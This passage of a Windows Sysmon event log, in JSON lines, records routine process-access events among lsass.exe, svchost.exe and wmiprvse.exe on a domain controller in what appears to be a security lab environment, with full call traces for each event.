:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+2685b|C:\\Windows\\system32\\wbem\\wbemcore.dll+22b78|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1006,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.115\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 588\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.115","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"588","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1007,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.115\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 588\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.115","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"588","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1008,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.115\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.115","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1009,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.115\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.115","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1010,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.115\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.115","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1011,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.678\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2912\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.678","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"2912","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1012,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.678\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:03.678","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1013,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:03.678\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 